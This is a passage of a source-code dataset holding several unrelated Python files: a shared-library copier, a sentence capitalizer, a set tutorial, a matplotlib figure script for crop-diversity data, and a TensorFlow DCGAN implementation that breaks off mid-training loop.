glob\n\n\npathRun = os.getcwd() + '/'\npathFile = os.path.abspath(__file__)\npathFileDir = pathFile[0: pathFile.rfind('/')] + '/'\npathUserHome = os.path.expanduser('~') + '/'\nplatform = sys.platform\npathCopy = '/reckless/RCF/lib/'\nboostMT = ''\nfileType = 'so'\nif 'darwin' == 
platform:\n    boostMT = '-mt'\n    fileType = 'dylib'\n\n\npublicDir = ['/usr/local/lib/', '/usr/lib/', '/usr/lib/x86_64-linux-gnu/', '/lib/x86_64-linux-gnu/']\nlibsDir = {\n    'libcurl.%s' % fileType: ['/usr/local/opt/curl/lib/', '/usr/local/opt/curl-openssl/lib/'],\n    'libssl.%s' % fileType: ['/reckless/opt/openssl_1.1.1/lib/'],\n    'libcrypto.%s' % fileType: ['/reckless/opt/openssl_1.1.1/lib/'],\n    'libhiredis.%s' % fileType: ['/usr/local/opt/hiredis/lib/'],\n    'libjsoncpp.%s' % fileType: ['/usr/local/opt/jsoncpp/lib/'],\n    'libglog.%s' % fileType: ['/usr/local/opt/glog/lib/'],\n    'libgflags.%s' % fileType: ['/usr/local/opt/gflags/lib/'],\n    #'libpthread.%s' % fileType: ['/usr/lib/'],\n    #'libdl.%s' % fileType: ['/usr/lib/'],\n    #'libm.%s' % fileType: ['/usr/lib/'],\n    #'libstdc++.%s' % fileType: ['/usr/lib/'],\n    #'libgcc_s.%s' % fileType: ['/usr/lib/'],\n    #'libc.%s' % fileType: ['/usr/lib/'],\n\n    'libboost_thread%s.%s' % (boostMT, fileType): ['/usr/local/opt/boost/lib/'],\n    'libboost_system%s.%s' % (boostMT, fileType): ['/usr/local/opt/boost/lib/'],\n    'libboost_atomic%s.%s' % (boostMT, fileType): ['/usr/local/opt/boost/lib/'],\n    'libboost_chrono%s.%s' % (boostMT, fileType): ['/usr/local/opt/boost/lib/'],\n    'libboost_date_time%s.%s' % (boostMT, fileType): ['/usr/local/opt/boost/lib/']\n}\n\n\nif not os.path.exists(pathCopy):\n    os.mkdir(pathCopy)\nfor i in libsDir:\n    print('Looking for %s' % i)\n\n    l = list()\n    for j in libsDir[i]:\n        l.append(j)\n    for j in publicDir:\n        l.append(j)\n\n    ok = False\n    for j in l:\n        pathObj = j + i\n        objDir = pathObj[:pathObj.rfind('/') + 1]\n        objName = pathObj[pathObj.rfind('/') + 1: ]\n        for f in glob.glob(objDir + objName + '*'):\n            ok = True\n            shutil.copy(f, pathCopy)\n    if not ok:\n        print('Failed to find %s: the file was not found in any search path, manual intervention is required' % i)\n        if 'linux' == platform:\n            sys.exit(-1)\n\n","sub_path":"copyDL.py","file_name":"copyDL.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313393777","text":"##Programmer: Joselyne Guillen\r\n##File Name: sentenceCapitalizer.py \r\n##Date: 3/14/21\r\n##Version: 1.6\r\n##Explanation of Program: \r\n##This program asks the user to input statements\r\n##that don't have the first characters of each\r\n##sentence capitalized and properly capitalizes\r\n##the user input for them.\r\n\r\ndef main(): #main function\r\n    userStringInput = input('Enter a statement with the first character of each sentence not capitalized\\n') #asks user to input an uncapitalized statement\r\n    print('Here is the statement with appropriate capitalization:') #label\r\n    newString = capitalize(userStringInput) #function-returning call that sends user input as argument to properly capitalize statement\r\n    print(newString) #prints capitalized statement\r\ndef capitalize(userString): #function that capitalizes the first character of each sentence\r\n    userStringList = userString.split('. ') #splits input into sentences on '. ' (only periods are treated as separators here) and turns each sentence into an element in a list\r\n    newSentences = [] #initialize list of corrected sentences\r\n    for sentence in userStringList: #loop to read each sentence element in the list\r\n        sentence = sentence.strip() #strips the sentence element of surrounding blank spaces\r\n        if sentence != '': #skip empty elements produced by stray separators\r\n            sentence = sentence[0].upper() + sentence[1:] #capitalize only the first character and keep the rest of the sentence unchanged\r\n        newSentences.append(sentence)\r\n    newChar = '. '.join(newSentences) #rebuild the statement, restoring the '. ' separators between sentences\r\n\r\n    if newChar.endswith('.'): #if string ends with period, leave as is\r\n        newChar = newChar + ''\r\n    elif newChar.endswith('?'): #if string ends with question mark, leave as is\r\n        newChar = newChar + ''\r\n    elif newChar.endswith('!'): #if string ends with exclamation mark, leave as is\r\n        newChar = newChar + ''\r\n    else:\r\n        newChar = newChar + '.' #if string doesn't end with punctuation, add a period at the end\r\n\r\n    return newChar #returns the modified statement\r\n\r\nmain() #function call for main\r\n","sub_path":"sentenceCapitalizer.py","file_name":"sentenceCapitalizer.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"55880981","text":"# Sets: unordered; there are mutable and immutable set types, and only immutable data can be a set element\n# Sets also use {}, like a dict without values\naset = set('hello') # mutable: {'h', 'e', 'l', 'o'}\nbset = frozenset('hello') # immutable\ncset = set(['hello', 'world']) # {'hello', 'world'}\n\nprint(len(aset))\nfor ch in aset:\n    print(ch)\n# ----------------\naset = set('abc') # {'b', 'a', 'c'}\nbset = set('cde')\nprint(aset & bset) # intersection\nprint(aset | bset) # union\nprint(aset - bset) # difference: elements that are in aset but not in bset\naset.add('new') # {'b', 'a', 'c', 'new'}\naset.update('new') # {'a', 'b', 'e', 'c', 'w', 'n', 'new'}\naset.update(('hello', 'world'))\naset.remove('hello') # removes 'hello'\n#----------------\naset = set('abcde')\nbset = set('cde')\nbset.issubset(aset) # bset is a subset of aset\naset.issuperset(bset) # aset is a superset of bset\naset.union(bset) # union\naset.intersection(bset) # intersection\naset.difference(bset) # difference\n","sub_path":"pythonScripts/PyScripts/PyScripts5/myset.py","file_name":"myset.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"340648091","text":"# \n# github Repo: https://github.com/clejae\n\n# ------------------------------------------ LOAD PACKAGES ---------------------------------------------------#\nimport os\nimport time\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Patch\nimport numpy as np\n\n# ------------------------------------------ DEFINE FUNCTIONS ------------------------------------------------#\ndef prepareDataFrame(df_pth, per_lst):\n    df_lst = []\n    for per in per_lst:\n        df = pd.read_excel(df_pth, per)\n        t_area = df['SUM'].sum()\n        for i in range(1, 10):\n            df[str(i)] = round(df[str(i)] / t_area * 100, 2)\n        df_lst.append(df)\n\n    mt_lst = []\n    for mt in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I']:\n        for df in df_lst:\n            df_mt = df[df['MainType'] == mt]\n            mt_lst.append(df_mt)\n        cols = ['MainType', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'SUM']\n        if mt != 'I':\n            df_dummy = pd.DataFrame(np.zeros((1, 11)), columns=cols)\n            mt_lst.append(df_dummy)\n    df_plt = pd.concat(mt_lst)\n\n    return df_plt\n\ndef cm2inch(*tupl):\n    inch = 2.54\n    if isinstance(tupl[0], tuple):\n        return tuple(i/inch for i in tupl[0])\n    else:\n        return tuple(i/inch for i in tupl)\n# ------------------------------------------ START TIME 
------------------------------------------------------#\nstime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"start: \" + stime)\n# ------------------------------------------ USER VARIABLES ------------------------------------------------#\nwd = r'\\\\141.20.140.91\\SAN_Projects\\FORLand\\Clemens\\\\'\n# ------------------------------------------ LOAD DATA & PROCESSING ------------------------------------------#\nos.chdir(wd)\n\n##########################################################\nout_pth = r\"figures\\in_paper\\FigS3_SuSc.tiff\"\n# ------------------------------------------ LOAD DATA & PROCESSING ------------------------------------------#\n## define lists to access data and datasheets\n## and to provide federal state names for annotation\nbl = 'LS'\nper_lst = ['12-18 Sub','12-18 Total']\n\n## create plot with subplots\nplt.rcParams['legend.handlelength'] = 1\nplt.rcParams['legend.handleheight'] = 1.125\nplt.rcParams['legend.title_fontsize'] = '10'\nplt.rcParams[\"font.family\"] = \"Calibri\"\n\nncol = 1\nnrow = 1\nfig, axs = plt.subplots(nrows=nrow, ncols=ncol, sharey=True, sharex=True, figsize=cm2inch(17.6, 8))\n\n## prepare data frame\ndf_pth = r\"data\\tables\\crop_sequence_types\\{0}\\{0}_2012-2018_CSTArea-StudyAreaSusanne.xlsx\".format(bl)\ndf_plt = prepareDataFrame(df_pth, per_lst)\n\n## plot stacked bars\ncolors = ['#ffd37f','#e69600','#a87000','#d1ff73','#7aab00','#4c7300','#bee8ff','#73b2ff','#004da8']\ndf_plt[[str(i)for i in range(1,10)]].plot(kind=\"bar\", stacked=True, color=colors, ax = axs, legend=False)\n\n## set x and y ticks and label them\naxs.set_yticks(np.arange(0, 31, step=5))\naxs.set_yticklabels(range(0, 31, 5), fontdict={'size': 10})\nx_ticks = list(np.arange(0,27,1))\ndel x_ticks[2::3]\naxs.set_xticks(x_ticks)\naxs.set_xticklabels(10 * ['Subset','Total'],fontdict={'size': 10})\n\n## label y axis\naxs.set_xlabel('Structural diversity', fontdict={'size': 10})\naxs.set_ylabel('Share of cropland [%]',fontdict={'size': 10})\n\n## add y-grid, adjust tick colors, remove frame\naxs.grid(b=True, which='major', axis='y', color='grey', linewidth=0.5)\naxs.tick_params(axis='x', colors='white', labelcolor ='black')\naxs.tick_params(axis='y', colors='grey', labelcolor ='black')\naxs.spines['bottom'].set_color('grey')\naxs.spines['right'].set_visible(False)\naxs.spines['left'].set_visible(False)\naxs.spines['top'].set_visible(False)\naxs.set_axisbelow(True)\n\n# ## Draw line between sub and total columns\n# x1 = 0\n# x2 = 0\n# for count in range(9):\n# x1 = count * 3 + 1.5\n# x2 = count * 3 + 2.5\n# plt.axvline(x1, 0, 30, ls ='--', c = 'black', lw = '0.5')\n# plt.axvline(x2, 0, 30, ls ='--', c = 'black', lw = '0.5')\n\n\n## annotate main types in top subplot\nbbox = dict(facecolor='white', edgecolor='black', boxstyle='round')\nx=0\nfor mt in ['A','B','C','D','E','F','G','H','I']:\n axs.annotate(mt, xy=(x, 26.5), fontsize=10)\n x += 3\n\n# create custom legend\nlegend_elements = [Patch(facecolor='#ffd37f', edgecolor='#ffd37f',\n label='1'),\n Patch(facecolor='#e69600', edgecolor='#e69600',\n label='2'),\n Patch(facecolor='#a87000', edgecolor='#a87000',\n label='3'),\n Patch(facecolor='#d1ff73', edgecolor='#d1ff73',\n label='4'),\n Patch(facecolor='#7aab00', edgecolor='#7aab00',\n label='5'),\n Patch(facecolor='#4c7300', edgecolor='#4c7300',\n label='6'),\n Patch(facecolor='#bee8ff', edgecolor='#bee8ff',\n label='7'),\n Patch(facecolor='#73b2ff', edgecolor='#73b2ff',\n label='8'),\n Patch(facecolor='#004da8', edgecolor='#004da8',\n 
label='9')]\n\nfig.legend(handles=legend_elements, loc='lower center', ncol=9, title ='Functional diversity', fontsize=9, frameon=False)# bbox_to_anchor= (0.00, 0.00, 0.1, 0.1))\nfig.tight_layout()\nfig.subplots_adjust(top=0.95,bottom=0.35)\nplt.savefig(out_pth, dpi=300)\n\n# ------------------------------------------ END TIME --------------------------------------------------------#\netime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"start: \" + stime)\nprint(\"end: \" + etime)\n# ------------------------------------------ UNUSED BUT USEFUL CODE SNIPPETS ---------------------------------#\n\n\n\n\n\n# ------------------------------------------ END TIME --------------------------------------------------------#\netime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"start: \" + stime)\nprint(\"end: \" + etime)\n# ------------------------------------------ UNUSED BUT USEFUL CODE SNIPPETS ---------------------------------#\n\n\n","sub_path":"figures_in_paper/figS03_sub_vs_total_csts_shares_in_ls.py","file_name":"figS03_sub_vs_total_csts_shares_in_ls.py","file_ext":"py","file_size_in_byte":6085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"321601180","text":"import os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom imagenet.build_model import build_model\nfrom imagenet.generator import Generator\nfrom imagenet.ops import BatchNorm, batch_norm_second_half, batch_norm_first_half, batch_norm_cross, linear, lrelu, \\\n conv2d\nfrom imagenet.utils import save_images\nfrom .ops import variables_on_gpu0, avg_grads\n\nfilename = \"/media/NAS_SHARED/imagenet/imagenet_train_128.tfrecords\"\n\n\nclass DCGAN(object):\n def __init__(self, sess, image_size=108, is_crop=True,\n batch_size=64, image_shape=[64, 64, 3],\n y_dim=None, z_dim=100, gf_dim=64, df_dim=64,\n gfc_dim=1024, dfc_dim=1024, c_dim=3, dataset_name='default',\n d_label_smooth=.25,\n generator_target_prob=1.,\n checkpoint_dir=None, sample_dir='samples',\n config=None,\n devices=None,\n disable_vbn=False,\n sample_size=64,\n out_init_b=0.,\n out_stddev=.15):\n \"\"\"\n\n Args:\n sess: TensorFlow session\n batch_size: The size of batch. Should be specified before training.\n y_dim: (optional) Dimension of dim for y. [None]\n z_dim: (optional) Dimension of dim for Z. [100]\n gf_dim: (optional) Dimension of gen filters in first conv layer. [64]\n df_dim: (optional) Dimension of discrim filters in first conv layer. [64]\n gfc_dim: (optional) Dimension of gen units for for fully connected layer. [1024]\n dfc_dim: (optional) Dimension of discrim units for fully connected layer. [1024]\n c_dim: (optional) Dimension of image color. 
[3]\n        \"\"\"\n        self.sess = sess  # store the session first: the summary writer below needs it\n        self.writer = tf.summary.FileWriter(\"./logs\", self.sess.graph)\n        self.saver = tf.train.Saver()\n        self.disable_vbn = disable_vbn\n        self.devices = devices\n        self.d_label_smooth = d_label_smooth\n        self.out_init_b = out_init_b\n        self.out_stddev = out_stddev\n        self.config = config\n        self.generator_target_prob = generator_target_prob\n        self.generator = Generator(self)\n        self.is_crop = is_crop\n        self.batch_size = batch_size\n        self.image_size = image_size\n        self.sample_size = sample_size\n        self.image_shape = image_shape\n        self.sample_dir = sample_dir\n\n        self.y_dim = y_dim\n        self.z_dim = z_dim\n\n        self.gf_dim = gf_dim\n        self.df_dim = df_dim\n\n        self.gfc_dim = gfc_dim\n        self.dfc_dim = dfc_dim\n\n        self.c_dim = c_dim  # honour the constructor argument instead of hardcoding 3\n\n        # batch normalization: deals with poor initialization and helps gradient flow\n        self.d_bn1 = BatchNorm(batch_size, name='d_bn1')\n        self.d_bn2 = BatchNorm(batch_size, name='d_bn2')\n\n        if not self.y_dim:\n            self.d_bn3 = BatchNorm(batch_size, name='d_bn3')\n\n        self.g_bn0 = BatchNorm(batch_size, name='g_bn0')\n        self.g_bn1 = BatchNorm(batch_size, name='g_bn1')\n        self.g_bn2 = BatchNorm(batch_size, name='g_bn2')\n\n        if not self.y_dim:\n            self.g_bn3 = BatchNorm(batch_size, name='g_bn3')\n        # Not used by all generators\n        self.g_bn4 = BatchNorm(batch_size, name='g_bn4')\n        self.g_bn5 = BatchNorm(batch_size, name='g_bn5')\n\n        self.dataset_name = dataset_name\n        self.checkpoint_dir = checkpoint_dir\n        self.build_model()\n\n    def build_model(self):\n        all_d_grads = []\n        all_g_grads = []\n        config = self.config\n        d_opt = tf.train.AdamOptimizer(config.discriminator_learning_rate, beta1=config.beta1)\n        g_opt = tf.train.AdamOptimizer(config.generator_learning_rate, beta1=config.beta1)\n\n        for idx, device in enumerate(self.devices):\n            with tf.device(\"/%s\" % device):\n                with tf.name_scope(\"device_%s\" % idx):\n                    with variables_on_gpu0():\n                        self.build_model_single_gpu(idx)  # bound method: passing self explicitly would raise a TypeError\n                        d_grads = d_opt.compute_gradients(self.d_losses[-1], var_list=self.d_vars)\n                        g_grads = g_opt.compute_gradients(self.g_losses[-1], var_list=self.g_vars)\n                        all_d_grads.append(d_grads)\n                        all_g_grads.append(g_grads)\n                        tf.get_variable_scope().reuse_variables()\n        avg_d_grads = avg_grads(all_d_grads)\n        avg_g_grads = avg_grads(all_g_grads)\n        self.d_optim = d_opt.apply_gradients(avg_d_grads)\n        self.g_optim = g_opt.apply_gradients(avg_g_grads)\n\n    def build_model_single_gpu(self, gpu_idx):\n        assert not self.y_dim\n\n        if gpu_idx == 0:\n            filename_queue = tf.train.string_input_producer([filename])  # num_epochs=self.config.epoch)\n            self.get_image, self.get_label = read_and_decode_with_labels(filename_queue)\n\n        with tf.variable_scope(\"misc\"):\n            chance = 1.  # TODO: declare this down below and make it 1. - 1. 
/ num_classes\n avg_error_rate = tf.get_variable('avg_error_rate', [],\n initializer=tf.constant_initializer(0.),\n trainable=False)\n num_error_rate = tf.get_variable('num_error_rate', [],\n initializer=tf.constant_initializer(0.),\n trainable=False)\n\n images, sparse_labels = tf.train.shuffle_batch([self.get_image, self.get_label],\n batch_size=self.batch_size,\n num_threads=2,\n capacity=1000 + 3 * self.batch_size,\n min_after_dequeue=1000,\n name='real_images_and_labels')\n if gpu_idx == 0:\n self.sample_images = tf.placeholder(tf.float32, [self.sample_size] + self.image_shape,\n name='sample_images')\n self.sample_labels = tf.placeholder(tf.int32, [self.sample_size], name=\"sample_labels\")\n\n self.reference_G, self.reference_zs = self.generator(is_ref=True)\n # Since I don't know how to turn variable reuse off, I can only activate it once.\n # So here I build a dummy copy of the discriminator before turning variable reuse on for the generator.\n dummy_joint = tf.concat(0, [images, self.reference_G])\n dummy = self.discriminator(dummy_joint, reuse=False, prefix=\"dummy\")\n\n G, zs = self.generator(is_ref=False)\n\n if gpu_idx == 0:\n G_means = tf.reduce_mean(G, 0, keep_dims=True)\n G_vars = tf.reduce_mean(tf.square(G - G_means), 0, keep_dims=True)\n G = tf.Print(G, [tf.reduce_mean(G_means), tf.reduce_mean(G_vars)], \"generator mean and average var\",\n first_n=1)\n image_means = tf.reduce_mean(images, 0, keep_dims=True)\n image_vars = tf.reduce_mean(tf.square(images - image_means), 0, keep_dims=True)\n images = tf.Print(images, [tf.reduce_mean(image_means), tf.reduce_mean(image_vars)],\n \"image mean and average var\", first_n=1)\n self.Gs = []\n self.zses = []\n self.Gs.append(G)\n self.zses.append(zs)\n\n joint = tf.concat(0, [images, G])\n class_logits, D_on_data, D_on_data_logits, D_on_G, D_on_G_logits = self.discriminator(joint, reuse=True,\n prefix=\"joint \")\n # D_on_G_logits = tf.Print(D_on_G_logits, [D_on_G_logits], \"D_on_G_logits\")\n\n self.d_sum = tf.histogram_summary(\"d\", D_on_data)\n self.d__sum = tf.histogram_summary(\"d_\", D_on_G)\n self.G_sum = tf.image_summary(\"G\", G)\n\n d_label_smooth = self.d_label_smooth\n d_loss_real = sigmoid_kl_with_logits(D_on_data_logits, 1. - d_label_smooth)\n class_loss_weight = 1.\n d_loss_class = class_loss_weight * tf.nn.sparse_softmax_cross_entropy_with_logits(class_logits,\n tf.to_int64(sparse_labels))\n error_rate = 1. - tf.reduce_mean(tf.to_float(tf.nn.in_top_k(class_logits, sparse_labels, 1)))\n # self.d_loss_class = tf.Print(self.d_loss_class, [error_rate], \"gpu \" + str(gpu_idx) + \" current minibatch error rate\")\n if gpu_idx == 0:\n update = tf.assign(num_error_rate, num_error_rate + 1.)\n with tf.control_dependencies([update]):\n # Start off as a true average for 1st 100 samples\n # Then switch to a running average to compensate for ongoing learning\n tc = tf.maximum(.01, 1. / num_error_rate)\n update = tf.assign(avg_error_rate, (1. 
- tc) * avg_error_rate + tc * error_rate)\n with tf.control_dependencies([update]):\n d_loss_class = tf.Print(d_loss_class,\n [avg_error_rate], \"running top-1 error rate\")\n # Do not smooth the negative targets.\n # If we use positive targets of alpha and negative targets of beta,\n # then the optimal discriminator function is\n # D(x) = (alpha p_data(x) + beta p_generator(x)) / (p_data(x) + p_generator(x)).\n # This means if we want to get less extreme values, we shrink alpha.\n # Increasing beta makes the generator self-reinforcing.\n # Note that using this one-sided label smoothing also shifts the equilibrium\n # value to alpha/2.\n d_loss_fake = tf.nn.sigmoid_cross_entropy_with_logits(D_on_G_logits,\n tf.zeros_like(D_on_G_logits))\n g_loss = sigmoid_kl_with_logits(D_on_G_logits, self.generator_target_prob)\n d_loss_class = tf.reduce_mean(d_loss_class)\n d_loss_real = tf.reduce_mean(d_loss_real)\n d_loss_fake = tf.reduce_mean(d_loss_fake)\n g_loss = tf.reduce_mean(g_loss)\n if gpu_idx == 0:\n self.g_losses = []\n self.g_losses.append(g_loss)\n\n d_loss = d_loss_real + d_loss_fake + d_loss_class\n if gpu_idx == 0:\n self.d_loss_reals = []\n self.d_loss_fakes = []\n self.d_loss_classes = []\n self.d_losses = []\n self.d_loss_reals.append(d_loss_real)\n self.d_loss_fakes.append(d_loss_fake)\n self.d_loss_classes.append(d_loss_class)\n self.d_losses.append(d_loss)\n\n # self.g_loss_sum = tf.scalar_summary(\"g_loss\", self.g_loss)\n # self.d_loss_sum = tf.scalar_summary(\"d_loss\", self.d_loss)\n\n if gpu_idx == 0:\n get_vars(self)\n\n def discriminator(self, image, reuse=False, y=None, prefix=\"\"):\n num_classes = 1001\n\n if reuse:\n tf.get_variable_scope().reuse_variables()\n\n batch_size = int(image.get_shape()[0])\n assert batch_size == 2 * self.batch_size\n\n \"\"\"\n # L1 distance to average value of corresponding pixel in positive and negative batch\n # Included as a feature to prevent early mode collapse\n b, r, c, ch = [int(e) for e in image.get_shape()]\n pos = tf.slice(image, [0, 0, 0, 0], [self.batch_size, r, c, ch])\n neg = tf.slice(image, [self.batch_size, 0, 0, 0], [self.batch_size, r, c, ch])\n pos = tf.reshape(pos, [self.batch_size, -1])\n neg = tf.reshape(neg, [self.batch_size, -1])\n mean_pos = tf.reduce_mean(pos, 0, keep_dims=True)\n mean_neg = tf.reduce_mean(neg, 0, keep_dims=True)\n\n # difference from mean, with each example excluding itself from the mean\n pos_diff_pos = (1. + 1. / (self.batch_size - 1.)) * pos - mean_pos\n pos_diff_neg = pos - mean_neg\n neg_diff_pos = neg - mean_pos\n neg_diff_neg = (1. + 1. 
/ (self.batch_size - 1.)) * neg - mean_neg\n\n diff_feat = tf.concat(0, [tf.concat(1, [pos_diff_pos, pos_diff_neg]),\n tf.concat(1, [neg_diff_pos, neg_diff_neg])])\n\n with tf.variable_scope(\"d_diff_feat\"):\n scale = tf.get_variable(\"d_untied_scale\", [128 * 128 * 3 * 2], tf.float32,\n tf.random_normal_initializer(mean=1., stddev=0.1))\n\n diff_feat = diff_feat = tf.exp(- tf.abs(scale) * tf.abs(diff_feat))\n diff_feat = self.bnx(diff_feat, name=\"d_bnx_diff_feat\")\n \"\"\"\n\n noisy_image = image + tf.random_normal([batch_size, 128, 128, 3],\n mean=0.0,\n stddev=.1)\n\n print(\"Discriminator shapes\")\n print(\"image: \", image.get_shape())\n\n def tower(bn, suffix):\n assert not self.y_dim\n print(\"\\ttower \" + suffix)\n h0 = lrelu(bn(conv2d(noisy_image, self.df_dim, name='d_h0_conv' + suffix, d_h=2, d_w=2,\n k_w=3, k_h=3), \"d_bn_0\" + suffix))\n print(\"\\th0 \", h0.get_shape())\n h1 = lrelu(bn(conv2d(h0, self.df_dim * 2, name='d_h1_conv' + suffix, d_h=2, d_w=2,\n k_w=3, k_h=3), \"d_bn_1\" + suffix))\n print(\"\\th1 \", h1.get_shape())\n h2 = lrelu(bn(conv2d(h1, self.df_dim * 4, name='d_h2_conv' + suffix, d_h=2, d_w=2,\n k_w=3, k_h=3), \"d_bn_2\" + suffix))\n print(\"\\th2 \", h2.get_shape())\n\n h3 = lrelu(bn(conv2d(h2, self.df_dim * 4, name='d_h3_conv' + suffix, d_h=1, d_w=1,\n k_w=3, k_h=3), \"d_bn_3\" + suffix))\n print(\"\\th3 \", h3.get_shape())\n h4 = lrelu(bn(conv2d(h3, self.df_dim * 4, name='d_h4_conv' + suffix, d_h=1, d_w=1,\n k_w=3, k_h=3), \"d_bn_4\" + suffix))\n print(\"\\th4 \", h4.get_shape())\n h5 = lrelu(bn(conv2d(h4, self.df_dim * 8, name='d_h5_conv' + suffix, d_h=2, d_w=2,\n k_w=3, k_h=3), \"d_bn_5\" + suffix))\n print(\"\\th5 \", h5.get_shape())\n\n h6 = lrelu(bn(conv2d(h5, self.df_dim * 8, name='d_h6_conv' + suffix,\n k_w=3, k_h=3), \"d_bn_6\" + suffix))\n print(\"\\th6 \", h6.get_shape())\n # return tf.reduce_mean(h6, [1, 2])\n h6_reshaped = tf.reshape(h6, [batch_size, -1])\n print('\\th6_reshaped: ', h6_reshaped.get_shape())\n\n h7 = lrelu(bn(linear(h6_reshaped, self.df_dim * 40, scope=\"d_h7\" + suffix), \"d_bn_7\" + suffix))\n\n return h7\n\n h = tower(self.bnx, \"\")\n print(\"h: \", h.get_shape())\n\n n_kernels = 300\n dim_per_kernel = 50\n x = linear(h, n_kernels * dim_per_kernel, scope=\"d_h\")\n activation = tf.reshape(x, (batch_size, n_kernels, dim_per_kernel))\n\n big = np.zeros((batch_size, batch_size), dtype='float32')\n big += np.eye(batch_size)\n big = tf.expand_dims(big, 1)\n\n abs_dif = tf.reduce_sum(\n tf.abs(tf.expand_dims(activation, 3) - tf.expand_dims(tf.transpose(activation, [1, 2, 0]), 0)), 2)\n mask = 1. 
- big\n masked = tf.exp(-abs_dif) * mask\n\n def half(tens, second):\n m, n, _ = tens.get_shape()\n m = int(m)\n n = int(n)\n return tf.slice(tens, [0, 0, second * self.batch_size], [m, n, self.batch_size])\n\n # TODO: speedup by allocating the denominator directly instead of constructing it by sum\n # (current version makes it easier to play with the mask and not need to rederive\n # the denominator)\n f1 = tf.reduce_sum(half(masked, 0), 2) / tf.reduce_sum(half(mask, 0))\n f2 = tf.reduce_sum(half(masked, 1), 2) / tf.reduce_sum(half(mask, 1))\n\n minibatch_features = [f1, f2]\n\n x = tf.concat(1, [h] + minibatch_features)\n print(\"x: \", x.get_shape())\n # x = tf.nn.dropout(x, .5)\n\n class_logits = linear(x, num_classes, 'd_indiv_logits')\n\n image_means = tf.reduce_mean(image, 0, keep_dims=True)\n mean_sub_image = image - image_means\n image_vars = tf.reduce_mean(tf.square(mean_sub_image), 0)\n\n generated_class_logits = tf.squeeze(tf.slice(class_logits, [0, num_classes - 1], [batch_size, 1]))\n positive_class_logits = tf.slice(class_logits, [0, 0], [batch_size, num_classes - 1])\n\n \"\"\"\n # make these a separate matmul with weights initialized to 0, attached only to generated_class_logits, or things explode\n generated_class_logits = tf.squeeze(generated_class_logits) + tf.squeeze(linear(diff_feat, 1, stddev=0., scope=\"d_indivi_logits_from_diff_feat\"))\n assert len(generated_class_logits.get_shape()) == 1\n # re-assemble the logits after incrementing the generated class logits\n class_logits = tf.concat(1, [positive_class_logits, tf.expand_dims(generated_class_logits, 1)])\n \"\"\"\n\n mx = tf.reduce_max(positive_class_logits, 1, keep_dims=True)\n safe_pos_class_logits = positive_class_logits - mx\n\n gan_logits = tf.log(tf.reduce_sum(tf.exp(safe_pos_class_logits), 1)) + tf.squeeze(mx) - generated_class_logits\n assert len(gan_logits.get_shape()) == 1\n\n probs = tf.nn.sigmoid(gan_logits)\n\n return [tf.slice(class_logits, [0, 0], [self.batch_size, num_classes]),\n tf.slice(probs, [0], [self.batch_size]),\n tf.slice(gan_logits, [0], [self.batch_size]),\n tf.slice(probs, [self.batch_size], [self.batch_size]),\n tf.slice(gan_logits, [self.batch_size], [self.batch_size])]\n\n def train(self, config):\n \"\"\"Train DCGAN\"\"\"\n\n d_optim = self.d_optim\n g_optim = self.g_optim\n\n tf.initialize_all_variables().run()\n\n # self.g_sum = tf.merge_summary([#self.z_sum,\n # self.d__sum,\n # self.G_sum, self.d_loss_fake_sum, self.g_loss_sum])\n # self.d_sum = tf.merge_summary([#self.z_sum,\n # self.d_sum, self.d_loss_real_sum, self.d_loss_sum])\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n # Hang onto a copy of z so we can feed the same one every time we store\n # samples to disk for visualization\n assert self.sample_size > self.batch_size\n assert self.sample_size % self.batch_size == 0\n sample_z = []\n steps = self.sample_size // self.batch_size\n assert steps > 0\n sample_zs = []\n for i in range(steps):\n cur_zs = self.sess.run(self.zses[0])\n assert all(z.shape[0] == self.batch_size for z in cur_zs)\n sample_zs.append(cur_zs)\n sample_zs = [np.concatenate([batch[i] for batch in sample_zs], axis=0) for i in range(len(sample_zs[0]))]\n assert all(sample_z.shape[0] == self.sample_size for sample_z in sample_zs)\n\n counter = 1\n\n if self.load(self.checkpoint_dir):\n print(\" [*] Load SUCCESS\")\n else:\n print(\" [!] 
Load failed...\")\n\n start_time = time.time()\n print_time = time.time()\n sample_time = time.time()\n save_time = time.time()\n idx = 0\n try:\n while not coord.should_stop():\n idx += 1\n batch_start_time = time.time()\n\n (\n _d_optim, _d_sum, _g_optim,\n errD_fake, errD_real, errD_class, errG\n ) = self.sess.run([d_optim, self.d_sum,\n g_optim, # self.g_sum,\n self.d_loss_fakes[0],\n self.d_loss_reals[0],\n self.d_loss_classes[0],\n self.g_losses[0]])\n\n counter += 1\n if time.time() - print_time > 15.:\n print_time = time.time()\n total_time = print_time - start_time\n d_loss = errD_fake + errD_real + errD_class\n sec_per_batch = (print_time - start_time) / (idx + 1.)\n sec_this_batch = print_time - batch_start_time\n print(\n \"[Batch %(idx)d] time: %(total_time)4.4f, d_loss: %(d_loss).8f, g_loss: %(errG).8f, \"\n \"d_loss_real: %(errD_real).8f, d_loss_fake: %(errD_fake).8f, \"\n \"d_loss_class: %(errD_class).8f, sec/batch: %(sec_per_batch)4.4f, \"\n \"sec/this batch: %(sec_this_batch)4.4f\"\n % locals())\n\n if (idx < 300 and idx % 10 == 0) or time.time() - sample_time > 300:\n sample_time = time.time()\n samples = []\n # generator hard codes the batch size\n for i in range(self.sample_size // self.batch_size):\n feed_dict = {}\n for z, zv in zip(self.zses[0], sample_zs):\n if zv.ndim == 2:\n feed_dict[z] = zv[i * self.batch_size:(i + 1) * self.batch_size, :]\n elif zv.ndim == 4:\n feed_dict[z] = zv[i * self.batch_size:(i + 1) * self.batch_size, :, :, :]\n else:\n assert False\n cur_samples, = 